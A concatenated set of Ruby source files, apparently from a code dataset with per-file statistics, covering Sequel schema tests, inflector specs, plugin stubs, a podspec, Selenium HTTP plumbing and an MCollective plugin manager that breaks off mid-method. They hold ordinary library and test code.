@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON UPDATE NO ACTION)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_delete => :restrict, :on_update => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON DELETE RESTRICT ON UPDATE SET DEFAULT)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:x, :y], :on_delete => :set_null, :on_update => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(x, y) ON DELETE SET NULL ON UPDATE SET NULL)"]
end
end
# create_table! is drop-then-create: it emits DROP TABLE before CREATE TABLE.
context "DB#create_table!" do
  setup do
    @db = SchemaDummyDatabase.new
  end
  specify "should drop the table and then create it" do
    @db.create_table!(:cats) {}
    @db.sqls.should == ['DROP TABLE cats', 'CREATE TABLE cats ()']
  end
end
# drop_table on a single table emits one DROP TABLE statement.
context "DB#drop_table" do
  setup do
    @db = SchemaDummyDatabase.new
  end
  specify "should generate a DROP TABLE statement" do
    @db.drop_table :cats
    @db.sqls.should == ['DROP TABLE cats']
  end
end
context "DB#alter_table" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should allow adding not null constraint" do
@db.alter_table(:cats) do
set_column_allow_null :score, false
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score SET NOT NULL"]
end
specify "should allow droping not null constraint" do
@db.alter_table(:cats) do
set_column_allow_null :score, true
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score DROP NOT NULL"]
end
specify "should support add_column" do
@db.alter_table(:cats) do
add_column :score, :integer
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN score integer"]
end
specify "should support add_constraint" do
@db.alter_table(:cats) do
add_constraint :valid_score, 'score <= 100'
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT valid_score CHECK (score <= 100)"]
end
specify "should support add_constraint with block" do
@db.alter_table(:cats) do
add_constraint(:blah_blah) {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT blah_blah CHECK ((x > 0) AND (y < 1))"]
end
specify "should support add_unique_constraint" do
@db.alter_table(:cats) do
add_unique_constraint [:a, :b]
end
@db.sqls.should == ["ALTER TABLE cats ADD UNIQUE (a, b)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_unique_constraint [:a, :b], :name => :ab_uniq
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT ab_uniq UNIQUE (a, b)"]
end
specify "should support add_foreign_key" do
@db.alter_table(:cats) do
add_foreign_key :node_id, :nodes
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN node_id integer REFERENCES nodes"]
end
specify "should support add_foreign_key with composite foreign keys" do
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :name => :cfk
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT cfk FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :key => [:nid, :pid]
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props(nid, pid)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :on_delete => :restrict, :on_update => :cascade
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props ON DELETE RESTRICT ON UPDATE CASCADE"]
end
specify "should support add_index" do
@db.alter_table(:cats) do
add_index :name
end
@db.sqls.should == ["CREATE INDEX cats_name_index ON cats (name)"]
end
specify "should support add_primary_key" do
@db.alter_table(:cats) do
add_primary_key :id
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN id integer PRIMARY KEY AUTOINCREMENT"]
end
specify "should support add_primary_key with composite primary keys" do
@db.alter_table(:cats) do
add_primary_key [:id, :type]
end
@db.sqls.should == ["ALTER TABLE cats ADD PRIMARY KEY (id, type)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_primary_key [:id, :type], :name => :cpk
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT cpk PRIMARY KEY (id, type)"]
end
specify "should support drop_column" do
@db.alter_table(:cats) do
drop_column :score
end
@db.sqls.should == ["ALTER TABLE cats DROP COLUMN score"]
end
specify "should support drop_constraint" do
@db.alter_table(:cats) do
drop_constraint :valid_score
end
@db.sqls.should == ["ALTER TABLE cats DROP CONSTRAINT valid_score"]
end
specify "should support drop_index" do
@db.alter_table(:cats) do
drop_index :name
end
@db.sqls.should == ["DROP INDEX cats_name_index"]
end
specify "should support rename_column" do
@db.alter_table(:cats) do
rename_column :name, :old_name
end
@db.sqls.should == ["ALTER TABLE cats RENAME COLUMN name TO old_name"]
end
specify "should support set_column_default" do
@db.alter_table(:cats) do
set_column_default :score, 3
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score SET DEFAULT 3"]
end
specify "should support set_column_type" do
@db.alter_table(:cats) do
set_column_type :score, :real
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score TYPE real"]
end
specify "should support set_column_type with options" do
@db.alter_table(:cats) do
set_column_type :score, :integer, :unsigned=>true
set_column_type :score, :varchar, :size=>30
set_column_type :score, :enum, :elements=>['a', 'b']
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score TYPE integer UNSIGNED",
"ALTER TABLE cats ALTER COLUMN score TYPE varchar(30)",
"ALTER TABLE cats ALTER COLUMN score TYPE enum('a', 'b')"]
end
end
context "Schema Parser" do
setup do
@sqls = []
@db = Sequel::Database.new
end
after do
Sequel.convert_tinyint_to_bool = true
end
specify "should raise an error if there are no columns" do
@db.meta_def(:schema_parse_table) do |t, opts|
[]
end
proc{@db.schema(:x)}.should raise_error(Sequel::Error)
end
specify "should parse the schema correctly for a single table" do
sqls = @sqls
proc{@db.schema(:x)}.should raise_error(Sequel::Error)
@db.meta_def(:schema_parse_table) do |t, opts|
sqls << t
[[:a, {:db_type=>t.to_s}]]
end
@db.schema(:x).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x']
@db.schema(:x).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x']
@db.schema(:x, :reload=>true).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x', 'x']
end
specify "should parse the schema correctly for all tables" do
sqls = @sqls
proc{@db.schema}.should raise_error(Sequel::Error)
@db.meta_def(:tables){[:x]}
@db.meta_def(:schema_parse_table) do |t, opts|
sqls << t
[[:x, {:db_type=>t.to_s}]]
end
@db.schema.should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x']
@db.schema.should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x']
@db.schema(nil, :reload=>true).should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x', 'x']
end
specify "should convert various types of table name arguments" do
@db.meta_def(:schema_parse_table) do |t, opts|
[[t, {:db_type=>t}]]
end
s1 = @db.schema(:x)
s1.should == [['x', {:db_type=>'x'}]]
@db.schema[:x].object_id.should == s1.object_id
@db.schema(:x.identifier).object_id.should == s1.object_id
@db.schema[:x.identifier].object_id.should == s1.object_id
s2 = @db.schema(:x__y)
s2.should == [['y', {:db_type=>'y'}]]
@db.schema[:x__y].object_id.should == s2.object_id
@db.schema(:y.qualify(:x)).object_id.should == s2.object_id
@db.schema[:y.qualify(:x)].object_id.should == s2.object_id
end
specify "should correctly parse all supported data types" do
@db.meta_def(:schema_parse_table) do |t, opts|
[[:x, {:type=>schema_column_type(t.to_s)}]]
end
@db.schema(:tinyint).first.last[:type].should == :boolean
Sequel.convert_tinyint_to_bool = false
@db.schema(:tinyint, :reload=>true).first.last[:type].should == :integer
@db.schema(:interval).first.last[:type].should == :interval
@db.schema(:int).first.last[:type].should == :integer
@db.schema(:integer).first.last[:type].should == :integer
@db.schema(:bigint).first.last[:type].should == :integer
@db.schema(:smallint).first.last[:type].should == :integer
@db.schema(:character).first.last[:type].should == :string
@db.schema(:"character varying").first.last[:type].should == :string
@db.schema(:varchar).first.last[:type].should == :string
@db.schema(:"varchar(255)").first.last[:type].should == :string
@db.schema(:text).first.last[:type].should == :string
@db.schema(:date).first.last[:type].should == :date
@db.schema(:datetime).first.last[:type].should == :datetime
@db.schema(:timestamp).first.last[:type].should == :datetime
@db.schema(:"timestamp with time zone").first.last[:type].should == :datetime
@db.schema(:"timestamp without time zone").first.last[:type].should == :datetime
@db.schema(:time).first.last[:type].should == :time
@db.schema(:"time with time zone").first.last[:type].should == :time
@db.schema(:"time without time zone").first.last[:type].should == :time
@db.schema(:boolean).first.last[:type].should == :boolean
@db.schema(:real).first.last[:type].should == :float
@db.schema(:float).first.last[:type].should == :float
@db.schema(:double).first.last[:type].should == :float
@db.schema(:"double precision").first.last[:type].should == :float
@db.schema(:numeric).first.last[:type].should == :decimal
@db.schema(:decimal).first.last[:type].should == :decimal
@db.schema(:money).first.last[:type].should == :decimal
@db.schema(:bytea).first.last[:type].should == :blob
end
end
| 33.665359 | 273 | 0.649297 |
4a1463cb672ec952cd686085cd38f0024b8fee1b | 1,580 | require File.dirname(__FILE__) + "/../spec_helper"
# Exercises the Inflector string helpers: camelize, pluralize/singularize
# (including irregular and uncountable words), demodulize, foreign_key
# derivation and constantize.
describe Inflector do
  it "should camelize strings" do
    Inflector.camelize("data_mapper").should == "DataMapper"
    Inflector.camelize("data_mapper/support").should == "DataMapper::Support"
  end
  it "should pluralize strings" do
    Inflector.pluralize("post").should == "posts"
    Inflector.pluralize("octopus").should == "octopi"
    Inflector.pluralize("sheep").should == "sheep"
    Inflector.pluralize("word").should == "words"
    Inflector.pluralize("the blue mailman").should == "the blue mailmen"
    Inflector.pluralize("CamelOctopus").should == "CamelOctopi"
  end
  it "should singularize strings" do
    Inflector.singularize("posts").should == "post"
    Inflector.singularize("octopi").should == "octopus"
    Inflector.singularize("sheep").should == "sheep"
    Inflector.singularize("word").should == "word"
    Inflector.singularize("the blue mailmen").should == "the blue mailman"
    Inflector.singularize("CamelOctopi").should == "CamelOctopus"
  end
  it "should demodulize strings" do
    Inflector.demodulize("DataMapper::Support").should == "Support"
  end
  it "should create foreign keys from class names and key names" do
    Inflector.foreign_key("Animal").should == "animal_id"
    Inflector.foreign_key("Admin::Post").should == "post_id"
    Inflector.foreign_key("Animal", "name").should == "animal_name"
  end
  it "should constantize strings" do
    Inflector.constantize("Class").should == Class
    # Bare raise_error: any exception class is accepted for unknown constants.
    lambda { Inflector.constantize("asdf") }.should raise_error
  end
end
| 37.619048 | 77 | 0.702532 |
267e31e2c50adb54cc6d5784b3b0615b043dba8c | 464 | module Embulk
require 'embulk/data_source'
class DecoderPlugin
def self.transaction(config, &control)
raise NotImplementedError, "DecoderPlugin.transaction(config, &control) must be implemented"
end
# TODO
# TODO new_java
def self.from_java(java_class)
JavaPlugin.ruby_adapter_class(java_class, DecoderPlugin, RubyAdapter)
end
module RubyAdapter
module ClassMethods
end
# TODO
end
end
end
| 17.846154 | 98 | 0.698276 |
287f3aab45a8e553ee76933756a799a63a8ca770 | 329 | require 'spec_helper'
require "paperclip/matchers"
# Expose Paperclip's shoulda-style matchers (have_attached_file, ...) to specs.
RSpec.configure do |config|
  config.include Paperclip::Shoulda::Matchers
end
# Association and attachment expectations for the Artifact model.
describe Artifact do
  it { should belong_to(:job) }
  it { should validate_presence_of(:job) }
  it { should have_attached_file(:asset) }
  it { should validate_attachment_presence(:asset) }
end
| 20.5625 | 52 | 0.753799 |
08217a09bdf4f0e20a65175e90516a7912938227 | 612 | # frozen_string_literal: true
require "git_modified_lines"
require "rspec/core/memoized_helpers"
# Load every shared helper under spec/support in a deterministic order.
Dir[File.dirname(__FILE__) + "/support/**/*.rb"].sort.each { |f| require f }
RSpec.configure do |config|
  config.include GitSpecHelpers
  # Enable flags like --only-failures and --next-failure
  config.example_status_persistence_file_path = ".rspec_status"
  # Disable RSpec exposing methods globally on `Module` and `main`
  config.disable_monkey_patching!
  # Accept both expect(...) and legacy .should syntax for expectations/mocks.
  config.expect_with :rspec do |c|
    c.syntax = %i[expect should]
  end
  config.mock_with :rspec do |c|
    c.syntax = %i[expect should]
  end
end
| 25.5 | 76 | 0.735294 |
b93ddbb7e75cef97500f4c5b5f5732f6eb79fbbe | 480 | # frozen_string_literal: true
module ActiveRecordDataLoader
  module ActiveRecord
    # Builds value generators for integer-typed columns.
    class IntegerValueGenerator
      class << self
        # Returns a zero-argument lambda producing a random non-negative
        # Integer that fits the column: at most the signed maximum for the
        # column's byte width, and never above 1_000_000_000.
        #
        # model_class and connection_factory are unused by this generator.
        def generator_for(model_class:, ar_column:, connection_factory: nil)
          signed_max = (2**(8 * column_byte_width(ar_column) - 1)) - 1
          cap = signed_max > 1_000_000_000 ? 1_000_000_000 : signed_max
          -> { rand(0..cap) }
        end

        private

        # Byte width of the column; a nil +limit+ is treated as 8 bytes.
        def column_byte_width(ar_column)
          ar_column.limit || 8
        end
      end
    end
  end
end
| 21.818182 | 88 | 0.629167 |
1c7a9c2c17107b0b64bff188e4a1f39bed6c1692 | 5,407 | #
# Be sure to run `pod spec lint MapTungiFramework.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
# Podspec for the MapTungiFramework SDK (iOS 9+, Swift 4, depends on Zip).
Pod::Spec.new do |spec|
  # βββ Spec Metadata ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # These will help people to find your library, and whilst it
  # can feel like a chore to fill in it's definitely to your advantage. The
  # summary should be tweet-length, and the description more in depth.
  #
  spec.name = "MapTungiFramework"
  spec.version = "0.2.0"
  # Typo fixed: "integarte" -> "integrate" (this text is shown on CocoaPods).
  spec.summary = "To integrate Map Tungi SDK with Club Mahindra App."
  # This description is used to generate tags and improve search results.
  # * Think: What does it do? Why did you write it? What is the focus?
  # * Try to keep it short, snappy and to the point.
  # * Write the description between the DESC delimiters below.
  # * Finally, don't worry about the indent, CocoaPods strips it!
  spec.description = <<-DESC
  To integrate Map Tungi SDK with Club Mahindra App to Navigate the User in 2D Map.
                   DESC
  spec.homepage = "https://github.com/kramesh2005new/MapTungiFrameworkSDK"
  # spec.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
  # βββ Spec License βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # Licensing your code is important. See https://choosealicense.com for more info.
  # CocoaPods will detect a license file if there is a named LICENSE*
  # Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
  #
  #spec.license = "MIT (example)"
  spec.license = { :type => "MIT", :file => "LICENSE" }
  # βββ Author Metadata βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # Specify the authors of the library, with email addresses. Email addresses
  # of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
  # accepts just a name if you'd rather not provide an email address.
  #
  # Specify a social_media_url where others can refer to, for example a twitter
  # profile URL.
  #
  spec.author = { "Ramesh K" => "" }
  # Or just: spec.author = "Ramesh K"
  # spec.authors = { "Ramesh K" => "" }
  # spec.social_media_url = "https://twitter.com/Ramesh K"
  # βββ Platform Specifics βββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # If this Pod runs only on iOS or OS X, then specify the platform and
  # the deployment target. You can optionally include the target after the platform.
  #
  # spec.platform = :ios
  # spec.platform = :ios, "5.0"
  spec.ios.deployment_target = "9.0"
  spec.swift_version = "4.0"
  # When using multiple platforms
  # spec.ios.deployment_target = "5.0"
  # spec.osx.deployment_target = "10.7"
  # spec.watchos.deployment_target = "2.0"
  # spec.tvos.deployment_target = "9.0"
  # βββ Source Location ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # Specify the location from where the source should be retrieved.
  # Supports git, hg, bzr, svn and HTTP.
  #
  spec.source = { :git => "https://github.com/kramesh2005new/MapTungiFrameworkSDK.git", :tag => "#{spec.version}" }
  # βββ Source Code ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # CocoaPods is smart about how it includes source code. For source files
  # giving a folder will include any swift, h, m, mm, c & cpp files.
  # For header files it will include any header in the folder.
  # Not including the public_header_files will make all headers public.
  #
  spec.source_files = "MapTungiFramework/**/*.{swift}"
  #spec.exclude_files = "Classes/Exclude"
  # spec.public_header_files = "Classes/**/*.h"
  # βββ Resources ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # A list of resources included with the Pod. These are copied into the
  # target bundle with a build phase script. Anything else will be cleaned.
  # You can preserve files from being cleaned, please don't preserve
  # non-essential files like tests, examples and documentation.
  #
  # spec.resource = "icon.png"
  spec.resources = "MapTungiFramework/**/*.{png,json,xib,html}"
  # spec.preserve_paths = "FilesToSave", "MoreFilesToSave"
  # βββ Project Linking ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # Link your library with frameworks, or libraries. Libraries do not include
  # the lib prefix of their name.
  #
  # spec.framework = "SomeFramework"
  # spec.frameworks = "SomeFramework", "AnotherFramework"
  # spec.library = "iconv"
  # spec.libraries = "iconv", "xml2"
  # βββ Project Settings βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
  #
  # If your library depends on compiler flags you can set them in the xcconfig hash
  # where they will only apply to your library. If you depend on other Podspecs
  # you can include multiple dependencies to ensure it works.
  # spec.requires_arc = true
  # spec.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
  # spec.dependency "JSONKit", "~> 1.4"
  spec.dependency "Zip", "~>1.1"
end
| 37.811189 | 121 | 0.604772 |
d5efd772c70c338bcfa4801c5ac73adaa34c734f | 3,423 | class Pmc::Criterio < ActiveRecord::Base
self.table_name = "#{CONFIG.bases.pez}.criterios"
has_many :peces_criterios, :class_name => 'Pmc::PezCriterio', :foreign_key => :criterio_id
has_many :peces, :through => :peces_criterios, :source => :pez
belongs_to :propiedad, :class_name => 'Pmc::Propiedad'
scope :select_propiedades, -> { select('criterios.id, nombre_propiedad') }
scope :select_join_propiedades, -> { select_propiedades.left_joins(:propiedad) }
scope :tipo_capturas, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::TIPO_CAPTURA_ID) }
scope :tipo_vedas, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::TIPO_DE_VEDA_ID) }
scope :procedencias, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::PROCEDENCIA_ID) }
scope :nom, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::NOM_ID) }
scope :iucn, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::IUCN_ID) }
scope :cnp, -> { select_join_propiedades.where("ancestry REGEXP '323/31[123456]$'").where("tipo_propiedad != 'estado'") }
scope :iucn_solo_riesgo, -> { iucn.where("propiedades.id IN (400,401,403,404,402)") } #Hardcodear estΓ‘ MAL, hay que evitarlo @calonsot#
validates_presence_of :valor
CON_ADVERTENCIA = ['Temporal fija', 'Temporal variable', 'Nacional e Importado'].freeze
def self.catalogo(prop = nil)
if prop.present?
resp = []
prop.siblings.map do |p|
next unless p.criterios.present?
if prop.descripcion.present?
resp << ["#{p.nombre_propiedad} - #{p.descripcion}", p.criterios.first.id]
else
resp << [p.nombre_propiedad, p.criterios.first.id]
end
end
resp
else
resp = Rails.cache.fetch('criterios_catalogo', expires_in: eval(CONFIG.cache.peces.catalogos)) do
grouped_options = {}
Pmc::Criterio.select(:id, :propiedad_id).group(:propiedad_id).each do |c|
prop = c.propiedad
next if prop.existe_propiedad?([Pmc::Propiedad::NOM_ID, Pmc::Propiedad::IUCN_ID])
llave_unica = prop.ancestors.map(&:nombre_propiedad).join('/')
grouped_options[llave_unica] = [] unless grouped_options.key?(llave_unica)
if prop.descripcion.present?
grouped_options[llave_unica] << ["#{prop.nombre_propiedad} - #{prop.descripcion}", c.id]
else
grouped_options[llave_unica] << [prop.nombre_propiedad, c.id]
end
end
grouped_options
end
resp
end
end
def self.cnp_select
cnp_options = ['Con potencial de desarrollo', 'MΓ‘ximo aprovechamiento permisible', 'En deterioro']
options = []
cnp_options.each do |c|
criterios = self.cnp.where('nombre_propiedad=?', c).map(&:id).join(',')
options << [c, criterios]
end
options
end
def self.dame_filtros
filtros = Rails.cache.fetch('filtros_peces', expires_in: eval(CONFIG.cache.peces.filtros)) do
{
grupos: Pmc::Propiedad.grupos_conabio,
zonas: Pmc::Propiedad.zonas,
tipo_capturas: self.tipo_capturas,
tipo_vedas: self.tipo_vedas,
procedencias: self.procedencias,
pesquerias: Pmc::Pez.filtros_peces.where(con_estrella: 1).distinct,
cnp: self.cnp_select,
nom: self.nom,
iucn: self.iucn_solo_riesgo
}
end
filtros
end
end | 34.928571 | 137 | 0.658779 |
aba004d2f57c3c0e95fa5ae239356194820acefb | 602 | namespace :test_track do
task :vendor_deps do
FileUtils.module_eval do
cd "vendor/gems" do
rm_r 'ruby_spec_helpers'
`git clone --depth=1 https://github.com/Betterment/ruby_spec_helpers.git && rm -rf ruby_spec_helpers/.git`
end
cd "vendor/gems/ruby_spec_helpers" do
rm_r(Dir.glob('.*') - %w(. ..))
rm_r Dir.glob('*.md')
rm_r %w(
Gemfile
Gemfile.lock
spec
), force: true
`sed -E -i.sedbak '/license/d' ruby_spec_helpers.gemspec`
rm_r Dir.glob('**/*.sedbak')
end
end
end
end
| 27.363636 | 114 | 0.571429 |
260a8cd03532a8ac3d3a185abe8024a445824666 | 206 | # frozen_string_literal: true
module Api
  module V1
    # Minimal health-check endpoint; useful as a liveness probe.
    class HealthCheckController < BaseController
      # Responds with a static JSON greeting.
      def index
        render json: { message: 'Welcome to Fshare Tool' }
      end
    end
  end
end
| 17.166667 | 58 | 0.669903 |
8757032254a94a059afdf754724de2ca4d05d219 | 216 | class CreateJoinTablePostsTopics < ActiveRecord::Migration[5.1]
# Creates the posts<->topics join table (no primary key, per Rails convention).
def change
  create_join_table(:posts, :topics) do |t|
    # Uncomment to add composite indexes if lookups need them:
    # t.index [:post_id, :topic_id]
    # t.index [:topic_id, :post_id]
  end
end
end
| 24 | 63 | 0.671296 |
aca550118584e886668cbeb71dbec728d6043540 | 690 |
class Landslider
  # Search criteria for the getLeads API call.
  class WsLeadSearch < WsSearch
    # @return [Integer]
    attr_writer :account_id, :company_id, :primary_owner_id, :status_id
    # @return [Boolean]
    attr_writer :hot
    # @return [Date]
    attr_writer :updated_on
    # @return [String]
    attr_writer :name

    # Serializes the populated criteria onto the SOAP request body.
    # NOTE(review): @status_id, @hot and @updated_on are settable above but
    # never serialized here — confirm whether the getLeads schema supports
    # them or whether the writers are dead code.
    # Element order may be significant to the SOAP endpoint; preserve it.
    # @param [Handsoap::XmlMason::Node] msg
    # @return [Handsoap::XmlMason::Node]
    def soapify_for(msg)
      super(msg)
      msg.add 'name', @name unless @name.nil?
      msg.add 'accountId', @account_id unless @account_id.nil?
      msg.add 'companyId', @company_id unless @company_id.nil?
      msg.add 'primaryOwnerId', @primary_owner_id unless @primary_owner_id.nil?
    end
  end
end
| 21.5625 | 76 | 0.7 |
1ca60eae24a85d664a735e151fa53dd2098dce3b | 2,386 | module Selenium
module WebDriver
  module Remote
    module Http
      # Shared plumbing for HTTP transports that talk to a remote WebDriver
      # server: builds request headers, serializes command payloads and
      # decodes server responses. Subclasses must implement #request.
      class Common
        MAX_REDIRECTS   = 20 # same as chromium/gecko
        CONTENT_TYPE    = "application/json"
        DEFAULT_HEADERS = { "Accept" => CONTENT_TYPE }

        attr_accessor :timeout
        attr_writer :server_url

        def initialize
          @timeout = nil
        end

        # Hook for subclasses - will be called on Driver#quit.
        def close
        end

        # Dispatches one WebDriver command and returns the decoded Response.
        #
        # verb         - HTTP method as a Symbol (:get, :post, :put, ...)
        # url          - URI or path String (resolved against server_url)
        # command_hash - payload Hash, or nil for body-less requests
        def call(verb, url, command_hash)
          url = server_url.merge(url) unless url.kind_of?(URI)

          headers = DEFAULT_HEADERS.dup
          headers['Cache-Control'] = "no-cache" if verb == :get

          if command_hash
            payload = WebDriver.json_dump(command_hash)
            headers["Content-Type"] = "#{CONTENT_TYPE}; charset=utf-8"
            headers["Content-Length"] = payload.bytesize.to_s if verb == :post || verb == :put

            if $DEBUG
              puts " >>> #{url} | #{payload}"
              puts " > #{headers.inspect}"
            end
          elsif verb == :post
            # Some servers reject POSTs without a body; send an empty JSON object.
            payload = "{}"
            headers["Content-Length"] = "2"
          end

          request verb, url, headers, payload
        end

        private

        # Base URI for the remote server; raises until it has been assigned.
        def server_url
          raise Error::WebDriverError, "server_url not set" unless @server_url
          @server_url
        end

        def request(verb, url, headers, payload)
          raise NotImplementedError, "subclass responsibility"
        end

        # Turns a raw HTTP status/body/content-type triple into a Response,
        # raising WebDriverError for anything unexpected.
        def create_response(code, body, content_type)
          status = code.to_i
          text   = body.to_s.strip
          type   = content_type.to_s
          puts "<- #{text}\n" if $DEBUG

          if type.include? CONTENT_TYPE
            raise Error::WebDriverError, "empty body: #{type.inspect} (#{status})\n#{text}" if text.empty?
            Response.new(status, WebDriver.json_load(text))
          elsif status == 204
            Response.new(status)
          else
            message = "unexpected response, code=#{status}, content-type=#{type.inspect}"
            message << "\n#{text}" unless text.empty?
            raise Error::WebDriverError, message
          end
        end
      end # Common
    end # Http
  end # Remote
end # WebDriver
end # Selenium
| 31.813333 | 114 | 0.532691 |
bb23a027e0a1b5b87cb55625e795205ea0e9f290 | 424 | module ImproveTypography
module Processors
  # Joins "word - word" (a run of one to three hyphens surrounded by
  # whitespace) into "word<em dash>word" using the configured em dash sign.
  # Returns the string unchanged when no sign is configured or no hyphen
  # is present.
  class EmDash < Processor
    REGEXP = /(\w+?)\s+-{1,3}\s+(\w+?)/i

    def call
      return str unless sign_exists?(em_dash_sign)
      # The original guard /-{1,3}/ matches whenever a single '-' is
      # present, so a plain include? is equivalent and cheaper.
      return str unless str.include?('-')

      str.gsub(REGEXP, "\\1#{em_dash_sign}\\2")
    end

    private

    # Configured sign, falling back to the locale translation.
    def em_dash_sign
      options.fetch(:em_dash_sign, translation(:em_dash_sign))
    end
  end
end
end
| 21.2 | 64 | 0.596698 |
261f84565e4d0e6f22191f53504043f2063ecc5b | 5,949 | module MCollective
# A simple plugin manager, it stores one plugin each of a specific type;
# the idea is that we can only have one security provider, one connector etc.
module PluginManager
  # Registry keyed by plugin type; each value is a hash with
  # :loadtime, :class (String or Class), :instance (nil until built),
  # and :single (whether the instance is cached).
  @plugins = {}

  # Adds a plugin to the list of plugins, we expect a hash like:
  #
  #    {:type => "base",
  #     :class => foo.new}
  #
  # or like:
  #    {:type => "base",
  #     :class => "Foo::Bar"}
  #
  # In the event that we already have a class with the given type
  # an exception will be raised.
  #
  # If the :class passed is a String then we will delay instantiation
  # till the first time someone asks for the plugin, this is because most likely
  # the registration gets done by inherited() hooks, at which point the plugin class is not final.
  #
  # If we were to do a .new here the Class initialize method would get called and not
  # the plugin's, we therefore only initialize the classes when they get requested via []
  #
  # By default all plugin instances are cached and returned later so there's
  # always a single instance. You can pass :single_instance => false when
  # calling this to instruct it to always return a new instance when a copy
  # is requested. This only works with sending a String for :class.
  def self.<<(plugin)
    plugin[:single_instance] = true unless plugin.include?(:single_instance)

    type = plugin[:type]
    klass = plugin[:class]
    single = plugin[:single_instance]

    raise("Plugin #{type} already loaded") if @plugins.include?(type)

    # If we get a string then store 'nil' as the instance, signalling that we'll
    # create the class later on demand.
    if klass.is_a?(String)
      @plugins[type] = {:loadtime => Time.now, :class => klass, :instance => nil, :single => single}
      Log.debug("Registering plugin #{type} with class #{klass} single_instance: #{single}")
    else
      # An already-built object was passed in; it is always treated as a
      # cached single instance regardless of :single_instance.
      @plugins[type] = {:loadtime => Time.now, :class => klass.class, :instance => klass, :single => true}
      Log.debug("Registering plugin #{type} with class #{klass.class} single_instance: true")
    end
  end

  # Removes a plugin from the list
  def self.delete(plugin)
    @plugins.delete(plugin) if @plugins.include?(plugin)
  end

  # Finds out if we have a plugin with the given name
  def self.include?(plugin)
    @plugins.include?(plugin)
  end

  # Provides a sorted list of plugin type names we know about
  def self.pluginlist
    @plugins.keys.sort
  end

  # Deletes all registered plugins
  def self.clear
    @plugins.clear
  end

  # Gets a plugin by type, instantiating it lazily on first access.
  # Cached (:single) plugins return the same object every time; others
  # get a fresh instance per call.
  def self.[](plugin)
    raise("No plugin #{plugin} defined") unless @plugins.include?(plugin)

    klass = @plugins[plugin][:class]

    if @plugins[plugin][:single]
      # Create an instance of the class if one hasn't been done before
      if @plugins[plugin][:instance].nil?
        Log.debug("Returning new plugin #{plugin} with class #{klass}")
        @plugins[plugin][:instance] = create_instance(klass)
      else
        Log.debug("Returning cached plugin #{plugin} with class #{klass}")
      end

      @plugins[plugin][:instance]
    else
      Log.debug("Returning new plugin #{plugin} with class #{klass}")
      create_instance(klass)
    end
  end

  # Use eval to create an instance of a class.
  # NOTE(review): eval here is deliberate (see rubocop disable) and klass
  # comes from in-process registration, not external input; Exception is
  # rescued so even load-time errors surface as a plugin error.
  def self.create_instance(klass)
